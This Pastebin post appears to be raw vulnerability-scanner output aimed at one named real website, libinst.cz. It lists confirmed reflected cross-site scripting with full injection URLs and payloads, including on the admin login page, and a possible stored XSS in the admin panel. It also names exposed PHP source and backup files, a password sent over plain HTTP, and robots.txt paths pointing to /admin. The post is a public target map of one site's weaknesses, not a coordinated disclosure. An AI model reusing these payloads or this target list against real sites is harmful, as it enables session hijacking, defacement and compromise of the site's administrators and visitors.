Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://libinst.cz - LiberΓ‘lnΓ institut - XSS -
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/komentare.php?centrum=5&typ=--><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: typ
- Parameter Type: Querystring
- Attack Pattern: --><script>alert(9)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/clanky.php?centrum=5&typ='><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: typ
- Parameter Type: Querystring
- Attack Pattern: '><script>alert(9)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/stranka.php?inc=email-send&adresa='"--></style></script><script>alert(0x0005C6)</script>&id=985
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: adresa
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0005C6)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/stranka.php?inc=email-send&adresa=clanky.php&id='"--></style></script><script>alert(0x0005CB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0005CB)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL : http://libinst.cz/stranka.php?inc=multimedia
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: str
- Parameter Type: Post
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/admin/administrace.php?lang=en
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: user
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0008A2)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/stranka_en.php?inc=multimedia_en
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: str
- Parameter Type: Post
- Attack Pattern: "><iframe onload=alert(9)>
- ||| [Possible] Permanent Cross-site Scripting
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/admin/administrace.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://libinst.cz/admin/administrace.php?lang=en
- ||| [Possible] PHP Source Code Disclosure
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Severity: Medium
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/osobni/schwarz/
- Vulnerable URL: http://libinst.cz/osobni/sima/
- Vulnerable URL: http://libinst.cz/osobni/stastny/
- Vulnerable URL: http://libinst.cz/osobni/barak/
- Vulnerable URL: http://libinst.cz/osobni/pavlik/
- Vulnerable URL: http://libinst.cz/osobni/stefunko/
- ||| Password Transmitted Over HTTP
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/admin/administrace.php?lang=en&id=alter_stranka
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Form target action: administrace.php?lang=en
- ||| [Possible] Backup File Found
- Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
- Severity: Low
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/novinky.php~
- Vulnerable URL: http://libinst.cz/rss.php~
- Vulnerable URL: http://libinst.cz/komentare.php~
- Vulnerable URL: http://libinst.cz/clanky.php~
- Vulnerable URL: http://libinst.cz/stranka.php~
- ||| Robots.txt Identified
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL : http://libinst.cz/robots.txt
- Interesting Robots.txt Entries:
- Disallow: /data
- Disallow: /etexts
- Disallow: /jirka
- Disallow: /pictures
- Disallow: /pic
- Disallow: /temp
- Disallow: /tl
- Disallow: /zeleznice
- Disallow: /cesta
- Disallow: /admin
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement